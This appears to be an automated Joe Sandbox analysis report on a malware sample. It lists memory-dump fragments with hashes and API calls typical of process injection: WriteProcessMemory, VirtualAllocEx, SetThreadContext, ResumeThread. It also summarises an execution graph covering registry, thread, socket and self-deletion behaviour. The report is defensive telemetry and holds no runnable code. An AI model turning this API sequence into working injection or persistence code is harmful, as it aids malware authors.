• Opcode Fuzzy Hash: fb50f7353e31376003bf3c1acba42cf9a9788542c225634c49f67cdcaf2728dc
• Instruction Fuzzy Hash: 8141BFB0C00719CFDB24DFA9C984ADDBBF2BF49304F24816AD408AB251DB75694ACF90
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 053140A8
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: b98042aca45463098d2584e906f95ce9eee76646f84a43c26ecb170de09b2a98
• Instruction ID: 1abb36b5e8bc803d3ab296da237ea553cd90ae45c9bb08ed78d518e6f9344ba0
• Opcode Fuzzy Hash: b98042aca45463098d2584e906f95ce9eee76646f84a43c26ecb170de09b2a98
• Instruction Fuzzy Hash: D12168759003599FCF10CFAAC884BDEBBF5FF88310F108429E919A7240C7759944CBA4
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 053140A8
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 7cb456a84290f3a80d07e261b68a2f059e3d55ec0fbed93429cbbc859cc038ba
• Instruction ID: 4fde961b3b8086b0950b487f8a0304c0e8b093bd4d43e30eaf21f4c40c051729
• Opcode Fuzzy Hash: 7cb456a84290f3a80d07e261b68a2f059e3d55ec0fbed93429cbbc859cc038ba
• Instruction Fuzzy Hash: C62146759003099FCB10DFAAC884BDEBBF5FF48320F10842AE919A7240C7799944CBA4
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD4AE,?,?,?,?,?), ref: 031BD56F
Memory Dump Source
• Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 2c9d811dcca58d179ad1eb1f063376068f824df3c4b1f35198b779518cd34a87
• Instruction ID: b3a93fb84752bdfdfdb690d5c3a8938cfb0ca1b1a1fb7dd11365e12447d2c9bd
• Opcode Fuzzy Hash: 2c9d811dcca58d179ad1eb1f063376068f824df3c4b1f35198b779518cd34a87
• Instruction Fuzzy Hash: AC21E3B5900208EFDB10DF9AD984AEEFBF8EB48310F14841AE918A3310D374A954CFA4
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05314188
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 78cdf62d022b51ed7f4d7852c28341d04a5318671599a07eececa7c2b24864f6
• Instruction ID: 54629ac9af0c3f6bb4b9dd084c96c9d1aac94c5a5ed8561cbd648d8a5974ec8f
• Opcode Fuzzy Hash: 78cdf62d022b51ed7f4d7852c28341d04a5318671599a07eececa7c2b24864f6
• Instruction Fuzzy Hash: D4212A718003599FCB10DFAAC885ADEFBF5FF48320F108429E919A7240C7789945DBA4
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05313EFE
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: a6d65d9c6a610c423607c3b5ac1c606b22931866aff08c3ee3bd7858a39aa956
                                                              • Instruction ID: bf3e924559581ed6e59ee6106f1b14393f27802a620b0776d74ee4c5449af668
                                                              • Opcode Fuzzy Hash: a6d65d9c6a610c423607c3b5ac1c606b22931866aff08c3ee3bd7858a39aa956
                                                              • Instruction Fuzzy Hash: BB2157B69002098FDB14CFA9C8857EEBFF4AF88314F14842AD859A7241CB789945CFA4
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05313EFE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: b39a89422b1ae4b32cc802ab918838e15acc7b7a04dd0162adf774577573c491
                                                              • Instruction ID: 472a7221a633b2ea0558fb842353e4f3b2ee61395d4b1e7797205e2e9b4231b5
                                                              • Opcode Fuzzy Hash: b39a89422b1ae4b32cc802ab918838e15acc7b7a04dd0162adf774577573c491
                                                              • Instruction Fuzzy Hash: 1D2149719003098FDB14DFAAC8857EEFBF4EF88324F14842AD819A7241CB789945CFA4
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05314188
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: bafeb882dffc3dd047495288572bb863d300db563e708daef323b0f88080efcd
                                                              • Instruction ID: 5c9257269808f241f7ab3077c8eac5c9b893957c148fcf83156b4ff9c2000cca
                                                              • Opcode Fuzzy Hash: bafeb882dffc3dd047495288572bb863d300db563e708daef323b0f88080efcd
                                                              • Instruction Fuzzy Hash: 39213C71C003599FCB10DFA9C884ADEFBF5FF48310F108429E919A7240C7749544DBA4
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD4AE,?,?,?,?,?), ref: 031BD56F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 967a39ad642a0136242fd2a85fad98c4fbf3515bc452159c2cad3d88065592d3
                                                              • Instruction ID: 182bb3cd30c4019aa85125ab94de644df1fdd551cb33c38242575d794718b736
                                                              • Opcode Fuzzy Hash: 967a39ad642a0136242fd2a85fad98c4fbf3515bc452159c2cad3d88065592d3
                                                              • Instruction Fuzzy Hash: 4221E0B59002499FDB10CFA9D984AEEBBF4EB48310F14841AE918A7350D378A944DFA4
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 572349a6306ae895a2766ae49476afdd4deb2a84d32ac7c8c0b8d3477ace9143
                                                              • Instruction ID: 39dd5559849bc88586636601b32e502bc0c130b5afc74acf7baa8345ed5083a0
                                                              • Opcode Fuzzy Hash: 572349a6306ae895a2766ae49476afdd4deb2a84d32ac7c8c0b8d3477ace9143
                                                              • Instruction Fuzzy Hash: 9211BF76A043058FDB14DB6AD8007EEB7F9EF8C310F088069D548A7650CB74A801CBE0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05313FC6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: c66fb6d9c95f7767eac8979893eeb69681b21a9ba89e1ecad7541957ad246113
                                                              • Instruction ID: 7108e2a77f217cdbd6c082c1d54f132250fe47229c90088614be4c228e3c5f5d
                                                              • Opcode Fuzzy Hash: c66fb6d9c95f7767eac8979893eeb69681b21a9ba89e1ecad7541957ad246113
                                                              • Instruction Fuzzy Hash: 8E1159769002499FCB10DFAAC844ADFBFF5EF88320F148819E519A7250CB75A544DFA4
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05313FC6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0799acda92e72115e6c08cd89878b27c8d61b5df415a7034b2cea881ad5bbcee
                                                              • Instruction ID: c382137dfd7647ee241b66b41edcaf7e215f631c5ddc9e0d8762bdb59d121a93
                                                              • Opcode Fuzzy Hash: 0799acda92e72115e6c08cd89878b27c8d61b5df415a7034b2cea881ad5bbcee
                                                              • Instruction Fuzzy Hash: 03113A769002499FCB10DFA9C844ADEFFF5EF88320F148819E519A7250C7759544DFA4
                                                              APIs
                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 077D9CB0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: 6904291eaf2eb12e5f656f4596843c2d2ddb84cdf82dcf189e8168ba7929c0cb
                                                              • Instruction ID: 4d331f54e2a1ae2a77b42ff8444d7eab4ceacb374b4b064671b47fcdbe457278
                                                              • Opcode Fuzzy Hash: 6904291eaf2eb12e5f656f4596843c2d2ddb84cdf82dcf189e8168ba7929c0cb
                                                              • Instruction Fuzzy Hash: B21123B1C0061A9FCB10CF9AD945B9EFBF8FB58320F14851AD918A3340D774AA44CFA5
                                                              APIs
                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 077D9CB0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              • Opcode ID: a2fdff6665d517f771f5f807c4a10138deecaff88d0ec8af832fd2556cc175eb
                                                              • Instruction ID: b32484c81e3b7f2c3a72d1fe1e46563037d9302a4b5b9f922b7b2bf2658c7ebf
                                                              • Opcode Fuzzy Hash: a2fdff6665d517f771f5f807c4a10138deecaff88d0ec8af832fd2556cc175eb
                                                              • Instruction Fuzzy Hash: 6E1123B5C0061A9BCB14DFAAD944B9EFBF4FB48320F10852AD918A3340D774A944CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 9b037e2cc446027f92678d72d7ad17ae4ee493c8ba7487484a887348574c95a3
                                                              • Instruction ID: e67597b01da4d074c166e6ac93d565b2188d524de76ffcc31ab95d825df9fb0d
                                                              • Opcode Fuzzy Hash: 9b037e2cc446027f92678d72d7ad17ae4ee493c8ba7487484a887348574c95a3
                                                              • Instruction Fuzzy Hash: 24113AB19002498FDB24DFAAC8457EEFFF8EF88324F148819D519A7240CB75A944CFA4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: d59d865d001b013d8abf724c290b2719e711912226d69d7228cd8a8c1e20121d
                                                              • Instruction ID: fbd44b8bf0ff5df1562e412d18f77c09c66d9d58a1b672a609ec0a304989f932
                                                              • Opcode Fuzzy Hash: d59d865d001b013d8abf724c290b2719e711912226d69d7228cd8a8c1e20121d
                                                              • Instruction Fuzzy Hash: 0C113AB19002498FDB24DFAAC8457EEFFF8EF88324F148819D519A7240CB75A944CFA4
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 3588cadd2c5ecdf347cdaab6e106d842bd19f598acf0cafa945f920e91d17bfb
                                                              • Instruction ID: ec3b7d358368860a60bd3a496913159bf381be7be28199b09ca1533163d2671b
                                                              • Opcode Fuzzy Hash: 3588cadd2c5ecdf347cdaab6e106d842bd19f598acf0cafa945f920e91d17bfb
                                                              • Instruction Fuzzy Hash: A91110B6C04249CFCB10CF9AC844ADEFBF4EB88320F14845AD469A7610C379A545CFA5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05317D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: e45f71fe396a5fb52460361b594f0ec937deda7dbb46b956bd81e51b2f2321d2
                                                              • Instruction ID: 67ca6fa09d9e2c955416a3dd260cc10b15586d623013ca54eff4985b43d4b862
                                                              • Opcode Fuzzy Hash: e45f71fe396a5fb52460361b594f0ec937deda7dbb46b956bd81e51b2f2321d2
                                                              • Instruction Fuzzy Hash: 9A11E0B58002499FCB10DF9AD984BEEBBF8EB58320F148459E919A7600D375A944CFA5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05317D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a648bbbcb0a9b1e9ce07bd9addd232592e3cc9adfd52e9de1bbac5957ee00cd9
                                                              • Instruction ID: 40ba398ad8e812a190058d067df05cf5c7cdd8c0bffbec0d0ad853ca7a577579
                                                              • Opcode Fuzzy Hash: a648bbbcb0a9b1e9ce07bd9addd232592e3cc9adfd52e9de1bbac5957ee00cd9
                                                              • Instruction Fuzzy Hash: FA11C2B5800249DFDB10DF9AD985BDEFBF8EB58320F148459E919A7200C375A944CFA5
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000), ref: 077D9D4F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a5aa180ad60a318d16b9ba398ff1db90e17d518bfe72da1f083f3730a5936f95
                                                              • Instruction ID: ba5d3d24018fd5ff5cc3de828eccfccb4e09053a3754d9c6507d5b278b168a02
                                                              • Opcode Fuzzy Hash: a5aa180ad60a318d16b9ba398ff1db90e17d518bfe72da1f083f3730a5936f95
                                                              • Instruction Fuzzy Hash: 1D1166B1800209CFCB20CF9AC849BDEFBF8EB58320F148429D518A3350D378A944CFA5
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000), ref: 077D9D4F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: ca41ea00c75f07f9e01b295f8e4354ab84dba63efe3d6fd59402c24a8a4303a3
                                                              • Instruction ID: 22136b3ff95ac2c7210718b2bca2ce200aef8652068d2e266f1137c6461dd520
                                                              • Opcode Fuzzy Hash: ca41ea00c75f07f9e01b295f8e4354ab84dba63efe3d6fd59402c24a8a4303a3
                                                              • Instruction Fuzzy Hash: 791128B1800359CFDB20DF9AC948BDEFBF8EB49320F108469D518A3251D778A944CFA5
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1e5741cae9c08bb28ec10a9e67c625a18c63b7ea294af8a24f3c95d848b87a6
                                                              • Instruction ID: 734c14df9d3c11e94865515c9185e16d19cc8e4cdf8b3a9c7009fce3112dd0e8
                                                              • Opcode Fuzzy Hash: e1e5741cae9c08bb28ec10a9e67c625a18c63b7ea294af8a24f3c95d848b87a6
                                                              • Instruction Fuzzy Hash: 4721C172504240DFDB15DF54E9C4B6AFBA5FB8C320F24C6A9E9190B246C33AD466CBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06826e96745cafe791e62349f38136f6f98c10ca9247353528463accdd125a98
                                                              • Instruction ID: 0d4b1239369a4fd0103dfa09c876bfcff5d38a3fbcc40916963db957a311a808
                                                              • Opcode Fuzzy Hash: 06826e96745cafe791e62349f38136f6f98c10ca9247353528463accdd125a98
                                                              • Instruction Fuzzy Hash: 9F210371504240DFCB15DF14E9C0B76BF75FB88328F24C5B9E8090B25AC336D466CAA2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25d17a1b65cd35aea2bb863ec5118f1e9ad66b2be71c5ef0e3b4b61e772836b2
                                                              • Instruction ID: 23551b316d12fdfbc4973f8394ae33e4a15028ba590cc9a2b2264d0224a1f4c6
                                                              • Opcode Fuzzy Hash: 25d17a1b65cd35aea2bb863ec5118f1e9ad66b2be71c5ef0e3b4b61e772836b2
                                                              • Instruction Fuzzy Hash: EE212671504200EFDB05DF14E9C0B26BFA5FB8C314F24C9ADE8194B256C33AD866CA61
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58e13bc19e134f1806316c67586fbf0107b29302b80c49eafa1a3698aad1b1b9
                                                              • Instruction ID: f927200169938c986077c2b2721aa204dd75ecb2f6f0be39e8d3dd49f11dec30
                                                              • Opcode Fuzzy Hash: 58e13bc19e134f1806316c67586fbf0107b29302b80c49eafa1a3698aad1b1b9
                                                              • Instruction Fuzzy Hash: 8F212271604240DFCB15DF14E980B26BF65EB88324F24C9ADD81A0B2A6C33AD867CA65
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1a5773061208671c83e23e21907c52065095f162a477e842293049e7ca78e66
                                                              • Instruction ID: e98909e6b28130fcd9107a198ca584a44f5173b626c01775d92152a5054bda57
                                                              • Opcode Fuzzy Hash: d1a5773061208671c83e23e21907c52065095f162a477e842293049e7ca78e66
                                                              • Instruction Fuzzy Hash: 642184755083809FCB12CF24D994715BF75EF4A314F28C5DAD8498F2A7C33A985ACB62
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                              • Instruction ID: 51fc5b43d689fcc12add57e9ed6fcff2f682e00a152ede3938c31f921dd11c8e
                                                              • Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                              • Instruction Fuzzy Hash: E5219D76504240DFDB16CF54D9C4B66FF62FB88314F28C6A9DD090A656C33AD42ACBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119088104.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_311d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction ID: c205463040ec8910d7cefaa07140e6daead244bd5bc69a09069ceece47500007
                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction Fuzzy Hash: DB11E976504240CFCF16CF14D5C4B66BF71FB88314F28C5A9D8450B65AC336D466CBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119188126.000000000312D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0312D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_312d000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction ID: 5a7def2f4391be14cafe025276396e51a03ae999338ea984619f816ff63ee24c
                                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction Fuzzy Hash: B1118B75504280DFDB16CF14D5C4B15FFA1FB88314F28C6ADD8494B696C33AD45ACB62
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53ea40da2052cf65f53bf8d00dd679592c33e2d71e9c250b8f0bfe05f8c3d55c
                                                              • Instruction ID: 10c4c79ce3d79bb0b8f1656a09834858b1caa0716509f38575bb997a49397988
                                                              • Opcode Fuzzy Hash: 53ea40da2052cf65f53bf8d00dd679592c33e2d71e9c250b8f0bfe05f8c3d55c
                                                              • Instruction Fuzzy Hash: D251F774E042198FCB19CFA9C9805AEBBB2FF89304F24856AD908AB256D7349941CF61

                                                              Execution Graph

                                                              Execution Coverage:1.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:517
                                                              Total number of Limit Nodes:9
                                                              execution_graph (rendered in the report as an interactive graph; the flattened node/edge export is summarised here by address and by the APIs each node reaches)
                                                              • 404e26: socket and thread teardown. WaitForSingleObject, SetEvent, CloseHandle, closesocket; 41e7a2 DeleteCriticalSection / EnterCriticalSection / LeaveCriticalSection
                                                              • 434918: CRT start-up. 434a8a IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (___scrt_fastfail); 434bb8 GetStartupInfoW; 443396 GetModuleHandleW; 44415f adds GetCurrentProcess / TerminateProcess on the fail path
                                                              • 40ea00: main routine reached from CRT start-up
                                                              • 41cbe1 LoadLibraryA / GetProcAddress, with 41cc10 GetModuleHandleA / GetProcAddress and 41cc20, 41cc39 LoadLibraryA / GetProcAddress (runtime API resolution; the resolved names are listed under Control-flow Graph below); 41cc49 44 API calls
                                                              • 40ea1c GetModuleFileNameW; 40f3fe -> 41b539 FindResourceA, 41b556 LoadResource / LockResource / SizeofResource (resource read); 43bda0 -> 4461e1 RtlAllocateHeap
                                                              • 40d0a4 -> 40d0ae CreateMutexA, GetLastError
                                                              • Registry: 413584, 407751, 413733, 41353a RegOpenKeyExA / RegQueryValueExA / RegCloseKey; 413a5e RegOpenKeyExW / RegDeleteValueW
                                                              • 407790 CreateProcessA, CloseHandle, CloseHandle
                                                              • 40f0dc StrToIntA -> 409e1f (169 API calls, _wcslen)
                                                              • Worker threads: 40f003 CreateThread -> 41d4ee (10 API calls); 40f126 and 40f17a CreateThread -> 41a045 (102 API calls); 40f1f6 CreateThread -> 401be9 (49 API calls, _strftime); 40f272 CreateThread -> 40f7e2 (120 API calls); 40f293 CreateThread -> 412132 (137 API calls) -> 412829 (61 API calls); 40f2a8 CreateThread -> 412716 (38 API calls)
                                                              • 40f359 / 40f36f / 40f381: Sleep loop retrying DeleteFileW, then 41bcef (28 API calls) and 413a5e RegOpenKeyExW / RegDeleteValueW
                                                              • Larger subroutines recorded by call count only: 40fbee (116), 40fb9f (77), 40f3eb (70), 40729b (97), 40f4af (103), 41ce2c (86), 41b580 and 41b69e (79), 414f65 (167) -> 41ada8 (104), 4124b0 (65)
                                                              • Exit path: 44323c -> 445909 EnterCriticalSection, 445951 LeaveCriticalSection, 4433da GetModuleHandleExW / GetProcAddress / FreeLibrary; 448d49 -> 443363 GetPEB, 443373 GetCurrentProcess / TerminateProcess; 44338b ExitProcess
                                                              • CRT helpers: 44854a / 4485a6 GetProcAddress (__crt_fast_encode_pointer); 4485e6 -> 448607, 44862f LoadLibraryExW, 448624 GetLastError, 448653 FreeLibrary; 434c99 and 4352fb RaiseException (__CxxThrowException@8); 43455e operator new (22 API calls)

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
